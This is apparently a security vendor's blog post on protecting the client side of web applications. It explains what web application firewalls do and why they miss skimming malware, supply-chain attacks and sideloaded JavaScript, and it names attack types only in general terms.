Protecting client-side web applications and websites is a goal that straddles both the application development and cybersecurity industries. Bugs and vulnerabilities in web applications represent a significant portion of the most common attack paths. However, there remains a bit of a struggle as to who is responsible for protecting the client side. Is it the security team or is it the application development team? While application security is shifting further to the left, both teams need to improve collaboration throughout the software development lifecycle to better integrate security earlier in the process and keep the client-side safe from e-skimming, Magecart, formjacking, and other client-side attacks.
To protect their customers from client-side attacks businesses have five primary tools at their disposal to secure the client-side: web application firewalls (WAF), content security policy (CSP), penetration testing and assessments (vulnerability and security), client-side vulnerability scanning, and JavaScript security permissions.
We’ll explore all of these solutions in future blogs. To get started, let’s discuss WAFs and their limitations.
What is a WAF?
A WAF helps businesses protect their web applications by filtering and monitoring HTTP traffic between the application and the internet. It protects web applications from attacks, such as cross-site forgery, cross-site-scripting (XSS), and SQL injection. WAFs are deployed in front of web applications and analyze bi-directional web-based (HTTP) traffic, detecting and blocking anything malicious. They are great tools to use when protecting your business from skimming attacks, but they can only do so much.
What WAF limitations do I need to be aware of?
WAFs are a special category of firewall that are designed specifically to protect web applications and your business from falling victim to skimming attacks. WAFs are deployed in front of web applications to analyze web traffic in order to detect and block malicious or unauthorized activity. According to the Payment Card Industry Data Security Standards (PCI-DSS), a WAF sits between a web application and the client endpoint and serves as a security policy enforcement point. Web application firewalls protect web applications from attacks, such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection.
However, WAFs are an open systems interconnection (OSI) layer 7 defense mechanism against application-layer attacks. They protect services that user-facing web applications apply to collect, store, and utilize data. WAFs are not designed to protect the browser-level user interface itself. In other words, if a web application and its user experience is a house, then the WAF protects the walls, not the furniture or the people inside. In the end, WAFs are not able to detect and protect businesses from sophisticated skimming malware, drive-by skimming, supply chain attacks, or side-loading and chainloading attacks.
WAFs cannot protect businesses or their customers from:
- Sophisticated Skimming Malware
- WAFs are not able to detect and protect businesses from more sophisticated skimming malware.
- Drive-by Skimming and Supply Chain Attacks
- WAFs are unable to detect manipulated JavaScript code or data exfiltration.
- Sideloading and Chainloading Attacks
- WAFs do not protect against skimming performed by a sideloaded JavaScript code.
Are WAFs right for me?
Absolutely. WAFs are great security tools to start protecting your business from client-side attacks. However, they can only block some client-side threats. They can’t block all of them. As with everything in security, there is no silver bullet to protect your business and your customers from all cyberthreats. A WAF will protect your connection between your servers and your customers, but the protection ends there. They can’t monitor or protect your business from browser-level threats outside of your security perimeter. To learn more about WAF’s and best-practices to improve your client-side security, check out our white paper.
Next Steps
Implementing effective client-side security is crucial to ensure the safety of your customer data, the integrity of your user experience, the functionality of your web applications and websites, and the ability for your business to grow and succeed. If you are on the long arduous journey to build a client-side security program, check out our blog over the coming weeks as we cover the remaining four client-side security approaches, CSP, pentesting & assessments, client-side vulnerability scanning, and JavaScript security permissions.